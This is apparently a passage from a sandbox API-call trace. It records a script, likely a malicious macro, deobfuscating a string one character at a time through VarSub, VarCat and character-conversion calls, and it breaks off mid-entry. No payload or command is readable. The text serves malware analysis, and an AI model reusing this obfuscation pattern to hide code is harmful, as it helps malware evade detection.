[0178.963] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.963] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.030] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.031] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.031] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.032] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.032] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.032] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.033] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.033] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.034] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0179.034] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.035] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.035] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.036] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.036] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.037] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0179.037] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.038] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.038] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.038] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0179.039] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.039] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.039] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.040] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.040] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.041] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.046] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.047] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0179.047] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.048] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0179.048] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.049] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0179.049] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.050] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.051] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.051] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.052] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.052] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.053] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.053] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.054] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.054] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.054] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.055] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.055] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.056] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.056] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.083] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.084] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.084] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.085] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.085] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.085] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.086] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.086] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.087] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.087] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.088] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.088] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.093] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.093] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.094] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.094] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.095] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.095] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.096] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.096] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.097] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.097] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.098] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.098] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.099] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.099] VarCat (in: 